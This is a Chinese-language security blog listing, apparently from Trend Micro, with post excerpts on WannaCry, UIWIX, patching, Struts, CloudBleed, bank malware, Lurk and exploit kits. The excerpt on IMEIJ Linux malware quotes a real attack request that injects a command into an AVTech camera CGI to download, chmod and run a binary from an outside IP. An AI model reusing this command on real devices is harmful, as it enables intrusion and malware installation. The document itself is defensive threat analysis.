WannaCry 勒索病毒尚未平息,利用相同漏洞攻擊的 UIWIX 接踵而來

 WannaCry 哭聲未止,其他網路犯罪集團紛紛利用相同的漏洞來攻擊

一波未平一波又起,上周末WannaCry(想哭)勒索病毒/勒索蠕蟲剛爆發,另一隻也是利用 Server Message Block (SMB) 漏洞的UIWIX勒索病毒緊接著發動網路攻擊,除了 UIWIX 勒索病毒 (趨勢科技命名為 RANSOM_UIWIX.A) 還有另一個專門開採墨內羅 (Monero) 貨幣的木馬程式。

UIWIX 並非 WannaCry,但更難偵測

最近有些新聞報導表示 UIWIX 是 WannaCry 新演化的版本,但根據我們持續不斷的分析發現,這是一個全新的勒索病毒 Ransomware (勒索軟體/綁架病毒)家族,只不過和 WannaCry 一樣是利用 Server Message Block (SMB) 漏洞 (MS17-010,代號 EternalBlue,由 Shadow Brokers 所公開揭露) 來感染系統並在網路內散布,同時還會掃瞄網際網路上的電腦以尋找更多受害者。

UIWIX 有何不同?首先,它是所謂的無檔案型態病毒,UIWIX 是經由 EternalBlue 漏洞直接進入記憶體中執行。無檔案的感染方式不會在電腦硬碟寫入檔案或元件,因此不會留下什麼痕跡,所以更難偵測。

此外,UIWIX 的行為更加謹慎,只要它偵測到虛擬機器 (VM) 或沙盒模擬環境存在,就會自行終止。根據 UIWIX 程式內的字串顯示,它似乎可以蒐集感染系統上所儲存的瀏覽器、FTP、電子郵件以及即時通訊軟體帳號登入資訊。

以下是 WannaCry 和 UIWIX 主要特點: Continue reading “WannaCry 勒索病毒尚未平息,利用相同漏洞攻擊的 UIWIX 接踵而來”

「設定更新已經完成25%,不要關閉你的電腦」急著下班時,看到這個很”想哭”嗎? 談WannaCry 勒索病毒和更新修補的現實問題

2017年至今被標記為重大的漏洞有637個而且還在增加中,這比2016年(共回報1057個)的速度更快,而且這些數字僅僅是用於遠端攻擊的漏洞!這些並不一定都會影響你的企業,但現實是你每個月都要面臨嚴重漏洞。

旁觀者的直覺反應是「為什麼他們沒有修補自己的系統?」就跟數位世界內的大多數問題一樣,這並沒有看上去那麼簡單。雖然責怪受害者很容易,但這波勒索活動真正凸顯出了防禦方所面臨的根本難處。

WannaCry攻擊活動使用的是已公開近 60天的已知漏洞。不幸的是,我們將會在未來,持續看到該漏洞被攻擊。

[編者按:關於趨勢科技產品與 WannaCry 相關的最新資訊,請參閱。]

作者:Mark Nunnikhoven(趨勢科技雲端研究副總)

2017年5月12日出現的 WannaCry勒索病毒被精心設計來充分利用今日大型企業所最常見的安全難題。從基本的網路釣魚開始,此變種利用最近的漏洞(CVE-2017-0144/MS17-010)在脆弱的內部網路散播,肆虐於大型組織。

來看看這則紐約時報的貼文,他們用我的資料作出一張很酷的動態地圖

– MalwareTech(@MalwareTechBlog)2017年5月13日

旁觀者的直覺反應是「為什麼他們沒有修補自己的系統?」就跟數位世界內的大多數問題一樣,這並沒有看上去那麼簡單。雖然責怪受害者很容易,但這波勒索活動真正凸顯出了防禦方所面臨的根本難處。

這並非最新的零時差漏洞,修補程式MS17-010在攻擊(或持續性攻擊)前59天就已經發布。今日安全社群所面臨的難題之一是如何在大量業務活動內有效的溝通網路安全。

 

馬上更新修補程式,不要再拖了 !

安全社群的共識是,更新修補是你的第一道防線。儘管如此,組織需要花上100天更久來部署修補程式的狀況並不少見。為什麼?原因很複雜。但大致可歸結到一個事實,就是IT對業務運作很重要。任何中斷都令人沮喪和代價高昂。

從使用者的角度來看,「設定更新已經完成25%,不要關閉你的電腦」急著下班時,看到這個很想哭嗎?持續進行更新很累人也妨礙到了工作。更糟的是更新後無法預期應用程式會發生什麼事。

Continue reading “「設定更新已經完成25%,不要關閉你的電腦」急著下班時,看到這個很”想哭”嗎? 談WannaCry 勒索病毒和更新修補的現實問題”

【勒索病毒警訊 】解析WannaCry/Wcry “想哭”史上第一勒索蠕蟲,感染流程與預防方法

今日爆出一款名為「WannaCry/Wcry(想哭)」的勒索病毒正在肆虐全球,包括美國《CNN》和英國《鏡報》報導皆報導了該則消息。根據趨勢科技Smart Protection Suites 的反饋資料顯示,台灣也受到此威脅嚴重影響,英國,智利,日本印度和美國也都傳出災情。

報導指出英國的國家醫療保健服務(NHS)遭到攻擊,許多醫院手術被迫取消,西班牙的電信公司、電力公司及公用事業的天然氣公司,都受到影響。葡萄牙的電信公司、聯邦快遞(FedEx)等也都受WannaCry/Wcry 勒索病毒影響。台灣今天也傳出桃園一名高中生遭「WannaCry」勒索病毒軟體攻擊,該病毒顯示支援28種語言,該男點選中文後,畫面隨即出現勒索訊息。

在今年初出現了兩個獨立的資安風險:CVE-2017-0144是一個可以造成遠端程式碼執行的 SMB伺服器漏洞,已經在三月份修復,還有會透過Dropbox網址散播的新勒索病毒 Ransomware (勒索軟體/綁架病毒)家族 WannaCry/Wcry在四月下旬出現。這兩種威脅現在結合在一起,造成對全球使用者最嚴重的勒索病毒攻擊。

勒贖通知要求用比特幣支付300美元;此金額要求已經低於早期的攻擊。除了一開始出現在英國的攻擊外,其他國家也遭受到嚴重的影響。

趨勢科技將這波攻擊所用的病毒變種偵測為RANSOM_WANA.A和RANSOM_WCRY.I。趨勢科技XGen安全防護所提供的預測機器學習技術和其他相關勒索病毒防護功能已經能夠主動保護客戶免於此攻擊的威脅。

 

[相關閱讀:使用免費的趨勢科技機器學習評估工具來評估現有端點防護軟體的安全間隙。]

 

近來勒索病毒驚傳變種,透過更多新型手法勒索您的檔案並要求支付高額贖金換取解密金鑰!
PC-cillin 2017勒索剋星可防範 WannaCry/Wcry勒索病毒,保護珍貴檔案,防止電腦被綁架,快為您的電腦做好防護!

 

感染途徑

這波攻擊所用的漏洞(代號EternalBlue)是Shadow Brokers駭客集團據稱從美國國家安全局(NSA)外洩的漏洞之一。攻擊該漏洞之後可以將檔案送入受害系統,再將此檔案作為服務執行。接著再將真正的勒索病毒檔案送入受害系統,它會用.WNCRY副檔名來對檔案進行加密(也會送入另一個用來顯示勒贖通知的檔案)。被針對的副檔名共有166種,包括Microsoft Office、資料庫、壓縮檔、多媒體檔案和各種程式語言常用的副檔名。
Continue reading “【勒索病毒警訊 】解析WannaCry/Wcry “想哭”史上第一勒索蠕蟲,感染流程與預防方法”

微軟正式停止更新 Vista ,是時候升級了

網路威脅的數量跟複雜程度都在日漸增加,有勒索病毒 Ransomware (勒索軟體/綁架病毒)會將你最重要的資料鎖住,還有資料竊取惡意軟體跟零時差威脅等…,我們在網路上時刻都要保持小心警惕,但我們也需要軟體廠商所提供的協助。這也是為什麼保持最新的安全更新是件相當重要的事情。

4月11日微軟終止 Windows Vista 作業系統的支援。這對那些尚未升級到更新更安全版本的人來說,也意味著現在時候到了。

Windows Vista 發行以來的十年,網路犯罪已經發展成價值數十億美元的全球性黑色產業

我們都面對著可怕的網路敵人。從Windows Vista發行以來的十年之間,網路犯罪已經真正發展成價值數十億美元的全球性黑色產業。駭客有時從遙遠的國家來攻擊消費者和企業,受到網路匿名保護而逃避了法律制裁。 Continue reading “微軟正式停止更新 Vista ,是時候升級了”

攻擊 CGI 漏洞的新 Linux 惡意程式

 

長久以來,Linux 一直是企業平台與物聯網(IoT ,Internet of Thing)裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統,並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及,針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅,其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現,並且在 2016 年 10 月公開揭露。不過在此之前,Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點,它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上,前述網站指令會讓裝置下載惡意檔案,並且將檔案設定成可執行檔。

圖 1:IMEIJ 的感染流程。 Continue reading “攻擊 CGI 漏洞的新 Linux 惡意程式”

CVE-2017-5638:Apache Struts 2 漏洞可能讓駭客從遠端執行程式

 

Apache Struts 是一個免費的開放原始碼程式開發架構,用來開發 Java 網站應用程式。我們仔細研究了過去 Apache Struts 被發現的幾個遠端程式碼執行 (Remote Code Execution,簡稱 RCE) 漏洞之後發現,歹徒大多使用 Object Graph Navigation Language (OGNL) 這個程式語言。OGNL 之所以很容易讓駭客從遠端執行任意的程式碼,是因為 Apache Struts 在大多數的流程當中都用到這個語言。

最近,一位研究人員在 Apache Struts 2 當中新發現一個關於 OGNL 的遠端程式碼執行漏洞:CVE-2017-5638。此外,一份報告也指出網路上已出現實際的漏洞攻擊案例,我們的研究和監控團隊也見過利用該漏洞的攻擊。

攻擊手法

駭客可以發送一個精心設計的網站請求給含有漏洞的伺服器,就能將一個檔案上傳至使用 Jakarta 外掛模組來處理檔案上傳請求的伺服器。

駭客接著在 Content-Type 標頭當中包含所要執行的指令來讓受害的伺服器執行指令。網路上已經出現示範這項攻擊手法的概念驗證

漏洞分析

為了深入了解這項漏洞,我們仔細研究了一下該漏洞的修補程式,我們發現廠商在 FileUploadInterceptor.java 當中已放棄使用「LocalizedTextUtil」這個類別。此類別原本是用來在 HTTP 檔案上傳請求失敗時提供錯誤訊息給使用者。 Continue reading “CVE-2017-5638:Apache Struts 2 漏洞可能讓駭客從遠端執行程式”

CloudFlare漏洞造成潛在的大規模資料外洩

全球最大型網路服務公司的程式碼出現嚴重缺陷,導致敏感資料會被外洩到網路上。在部落格的事後檢討文章中,CloudFlare詳細說明了其邊際伺服器如何受到緩衝區溢出的影響,導致對使用CloudFlare服務的網站所發出的請求會返回隨機資料位元,這可能包含了私密資訊如API金鑰、使用者憑證、cookies甚至是私人訊息。外洩資料也被搜尋引擎所暫存,增加了被用在惡意用途的可能性。這個漏洞已經被非正式地稱為「CloudBleed」,因為它跟早期的HeartBleed漏洞有相似之處。

「CloudBleed」一開始是由Google研究人員Travis Omandy所發現,他在觀察到對使用CloudFlare服務的網站所發出HTTP請求的異常行為時回報了此一問題。經過分析,CloudFlare將問題追查至其新的cf-html HTML解析程式。具體地說,這個問題跟存在其舊Ragel解析程式內多年的程式碼錯誤有關,不過問題會浮現是因為切換到新解析程式改變了緩衝機制,導致資料外洩的發生。

CloudFlare的即時回應是停用使用有資料外洩問題HTML解析程式的相關功能。此外,也組成了一個團隊來找出和修復解析程式內的錯誤,他們會設法在短時間內完成任務,在資料被更廣泛擴散前將潛在的傷害最小化。

 

網路使用者應該擔心嗎?

考量到使用CloudFlare服務的網站數量和資料可能遭到外洩的有效時間長度(最早可能從2016年9月),這似乎是件應該擔心的事情,特別是對經常使用CloudFlare相關網站的使用者來說。不過該公司也說明了資料外洩所造成的影響並沒有那麼大。據估計,在2月13日至18日期間所造成的資料外洩影響最大,透過CloudFlare所進行的3,300,300個HTTP請求中有約1個(0.00003%)可能會導致記憶體資料外洩。

這一點再加上CloudFlare對此事件的快速回應,顯示出資料外洩的影響應該很小。不過這起事件還是提醒了所有網路使用者必須要做好準備來保護自己最重要的數位資產 – 特別是包含敏感資料的部分。

因為主要問題並非使用者所能夠控制,所以使用者能做的最佳行動是變更使用CloudFlare基礎設施網站上的密碼。除了變更密碼,這或許也是個好時機讓使用者去採用更有效的驗證方法,如雙因子身份認證

 

@原文出處:CloudFlare Flaw Causes Potential Major Data Leak

波蘭銀行和其他金融機構遭受新惡意軟體攻擊

2017年 2月,許多的波蘭銀行回報在系統上出現未曾偵測到的惡意軟體變種。受影響的銀行報告了異常行為,包括連到國外的網路流量、加密的可執行檔和使用者工作站上的惡意軟體。惡意軟體分析顯示一旦其下載到工作站後,它會連到外部伺服器並且進行網路探勘、橫向移動和資料流出。

 

該惡意軟體被懷疑是放在波蘭金融監管局(該國的金融監管機構)網站上。有意思的是,研究人員還發現有證據顯示攻擊所用的程式碼跟墨西哥全國銀行及證券監察委員會及烏拉圭銀行所發生攻擊事件內的程式碼相似

有跡象顯示針對波蘭銀行的攻擊屬於更大規模全球性攻擊活動的一部分,這波攻擊活動針對31個國家的104個金融組織。攻擊者入侵了目標組織的網站,注入惡意程式碼來將訪客重新導向會安裝惡意軟體的漏洞攻擊套件。漏洞攻擊套件是種用來感染訪客的客製化工具,特別是使用目標金融機構所擁有IP地址的使用者。 Continue reading “波蘭銀行和其他金融機構遭受新惡意軟體攻擊”

洗劫金融機構超過4500萬美元,第一批運用無檔案感染技術的網路犯罪集團:Lurk

無檔案感染技術已經被用來將目標電腦加入「Botnet傀儡殭屍網路」、派送勒索病毒、感染銷售端點(PoS)系統及進行點擊詐騙(click fraud)。

Lurk第一批運用無檔案感染技術的網路犯罪集團,如何從一群威脅分子轉變成完整的網路犯罪組織?

為何Lurk 總選擇在午休時間進行惡意內容派送?

沒有單一網路防禦工具可以處理這些威脅,IT 如何因應?

Lurk 興風作浪的這五年

 

無檔案感染(Fileless Infection)就如同其名:沒有下載或寫入惡意檔案到磁碟就感染了系統。無檔案感染並非新技術或罕見,而且對企業和一般使用者都造成了嚴重的威脅,因為它能夠取得權限並且一直待在攻擊者的目標系統內而不被發現。但是無檔案感染技術已經被用來將目標電腦加入「Botnet傀儡殭屍網路」派送勒索病毒感染銷售端點(PoS)系統及進行點擊詐騙(click fraud)。無檔案感染對攻擊者來說,重要的一點是可以先評估中毒系統,確認感染狀態再決定是否繼續或消失無蹤。

典型的Lurk攻擊會利用瀏覽器漏洞將非持久性病毒派送給目標受害者

Lurk屬於第一批在大規模攻擊中有效地運用無檔案感染技術的網路犯罪集團,這些技術之後也成為其他犯罪分子的重要手段。典型的Lurk攻擊會利用瀏覽器漏洞將非持久性病毒派送給目標受害者,在部署其他惡意軟體前先探測其目標。感染鏈有多個階段,可以利用在記憶體內執行的無檔案病毒來進行而無須另外的持久性機制。如果Lurk集團對目標系統不感興趣,則在感染系統內除了來自漏洞攻擊程序的檔案外不會留下其他痕跡。這種隱匿行為讓其惡名昭彰,直到幕後黑手被逮捕而停止了行動。俄羅斯內政部在2月8日逮捕了9名以上的嫌犯。Lurk集團從金融機構獲取超過4500萬美元,同時也破壞了受害者的營運、信譽和重要的一切。

Lurk是如何從一群威脅分子轉變成完整的網路犯罪組織?他們還知道什麼其他的技術可能被其他網路犯罪分子仿效?他們的運作模式如何從針對俄羅斯一般使用者轉成銀行和企業?我們對該組織的觀察是基於對其程式碼、網路流量和網址特徵的分析,我們在俄羅斯數個組織的入侵偵測系統在Lurk集團活動的五年間進行監視。

2011年至2012年初:利用路過式下載「Drive by download」攻擊瀏覽器漏洞進而危害系統

Lurk的網頁攻擊是他們攻擊活動的首要跡象。他們實作了某些機制來防止防毒偵測。比方說,特定時間區段或非其目標區域IP來的網頁連線請求會被重新導到第三方網站(如Google)。 Continue reading “洗劫金融機構超過4500萬美元,第一批運用無檔案感染技術的網路犯罪集團:Lurk”

企業平均約需要 30 天完成修補程式測試,「漏洞攻擊套件 + 勒索病毒」,考驗和時間賽跑的 IT 管理員

  • 至少有 18% 的已知勒索病毒 Ransomware (勒索軟體/綁架病毒)家族現在都經由漏洞攻擊套件散布
  • 光是 2016 年第一季,勒索病毒就從企業身上海撈了將近2.09 億美元的不法所得

不論任何時刻,網路總是會存在著漏洞,尤其若網路上還有一些老舊的系統或軟體,再加上零時差漏洞,那麼系統管理員根本就永遠在和時間賽跑。IT 系統管理員甚至必須想辦法在漏洞攻擊套件已收錄的零時差漏洞修補之前防範網路遭受攻擊。他們必須面對各種挑戰,例如,他們不僅要維護關鍵系統的營運不間斷,還要保護網路邊境。就算拿到了漏洞修補程式,也要先完成測試才能開始部署。企業平均約需要 30 天的時間來完成修補程式測試。這樣的情況再加上其他因素,就會導致空窗期,讓漏洞攻擊套件有機可乘。

 ————————————————-

漏洞攻擊服務(Exploits as a Service):「漏洞攻擊套件 + 勒索病毒」如何影響企業生計?

2013 年,Blackhole 漏洞攻擊套件和 搜尋CryptoLocker 開創了漏洞攻擊套件與勒索病毒聯手出擊的先例。沒過多久,其他漏洞攻擊套件,如:Angler、Neutrino、Magnitude 和 Rig 也隨之跟進。至少有 18% 的已知勒索病毒 Ransomware (勒索軟體/綁架病毒)家族現在都經由漏洞攻擊套件散布。

值得一提的是,漏洞攻擊套件最早從 2006年起便一直是各種威脅的散布管道。2010 年至今,趨勢科技至少已發現 100 個漏洞被收錄到幾十個套件當中。勒索病毒僅是漏洞攻擊套件可能植入系統當中的眾多威脅類型之一。

[延伸閱讀:進一步認識漏洞攻擊套件]

光是 2016 年第一季,勒索病毒就從企業身上海撈了將近2.09 億美元的不法所得。雖然勒索病毒的直接風險就是資料損失,但它還會帶來其他的不良後果,包括:品牌和商譽損失、法律賠償以及復原關鍵資料的額外成本。

[延伸閱讀:勒索病毒當道的時代 ]

漏洞攻擊套件為何會成為各種威脅的有效的散布管道?首先,這類攻擊無需假借使用者之手,因為它們利用的是熱門軟體未修補的漏洞。光是今年上半年,趨勢科技 (加上 TippingPoint) 和 ZDI 漏洞懸賞計劃就發現了 473 個漏洞。 Continue reading “企業平均約需要 30 天完成修補程式測試,「漏洞攻擊套件 + 勒索病毒」,考驗和時間賽跑的 IT 管理員”